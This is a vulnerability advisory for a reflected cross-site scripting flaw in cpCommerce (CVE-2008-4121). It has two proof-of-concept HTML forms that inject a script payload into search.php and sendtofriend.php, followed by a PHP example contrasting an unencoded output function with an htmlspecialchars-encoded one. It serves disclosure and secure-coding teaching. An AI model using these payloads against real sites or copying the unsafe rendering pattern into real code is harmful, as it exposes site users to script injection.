nix.engineering

Cross Site Scripting (XSS) Vulnerability in cpCommerce, CVE-2008-4121

Posted on September 4, 2008, updated May 20, 2019
References

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4121
http://cpcommerce.cpradio.org/

Description

cpCommerce is an open-source e-commerce application that is built and extended through templates and modules. Versions before 1.2.4 reflect the "search" parameter of search.php and the "name" parameter of sendtofriend.php back into the page without HTML-encoding them, so a request carrying a crafted value results in reflected cross-site scripting.

Example

Assuming cpcommerce is installed on http://localhost/cpcommerce/, anybody could inject JavaScript:

<form method="post" action="http://localhost/cpcommerce/search.php">
<input type="hidden" name="action" value="search.quick">
<input type="text" name="search" value='"><script>alert(1)</script>'>
<input type=submit></form>

<form method="post" action="http://localhost/cpcommerce/sendtofriend.php">
<input type="hidden" name="action" value="sendtofriend">
<input type="text" name="name" value='"><script>alert(1)</script>'>
<input type=submit></form>
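The root cause in both forms is the same: a request parameter is written into HTML markup unencoded, so a value containing "> can close the attribute and start a script element. The following is an added example, not cpCommerce's own code, of how a PHP handler should emit such values. The parameter name "search" and the payload are taken from the advisory's form above; the handler and its function names are hypothetical.

```php
<?php
// Added example (not cpCommerce code): encoding a user-supplied form value
// at the point where it is written back into HTML. The parameter name
// `search` and the payload come from the advisory; the handler is hypothetical.

declare(strict_types=1);

/**
 * Encode a string for insertion into HTML text or a double-quoted attribute.
 * ENT_QUOTES encodes both ' and ", so a value such as "><script> cannot
 * terminate the attribute it is placed in. ENT_SUBSTITUTE replaces invalid
 * UTF-8 sequences instead of returning an empty string, which would silently
 * blank the output.
 */
function html_escape(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Vulnerable pattern: the raw request value is concatenated into markup. */
function render_search_box_unsafe(string $search): string
{
    return '<input type="text" name="search" value="' . $search . '">';
}

/** Hardened pattern: the value is encoded exactly where it enters HTML. */
function render_search_box(string $search): string
{
    return '<input type="text" name="search" value="' . html_escape($search) . '">';
}

// In a real request handler the value would come from the form, e.g.
// $search = (string) ($_POST['search'] ?? '');
// Constructed input for this stand-alone run: the advisory's payload.
$payload = '"><script>alert(1)</script>';

echo "unsafe:   ", render_search_box_unsafe($payload), PHP_EOL;
echo "hardened: ", render_search_box($payload), PHP_EOL;

// The hardened output contains no "<script" sequence at all; the browser
// shows the payload as the literal text of the value attribute.
var_dump(strpos(render_search_box($payload), '<script') === false);
```

Run it with php from the command line to compare the two lines of output. Encoding must happen at output time rather than on input, because the same stored value may later be placed in an attribute, in element text, or in a JavaScript string, and each context needs its own encoding; htmlspecialchars with ENT_QUOTES covers the first two, which are the contexts the two vulnerable forms use.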

Disclosure Timeline

2008-09-23 Vendor contacted
2008-09-23 Vendor released 1.2.4
2008-10-19 Published advisory

CVE Information

The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2008-4121 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems.

Credits and copyright

This vulnerability was discovered by Fabian Fingerle (published with help from Hanno Boeck).
It is licensed under the Creative Commons Attribution license.

Fabian Fingerle, 2008-09-04, http://www.fabian-fingerle.de
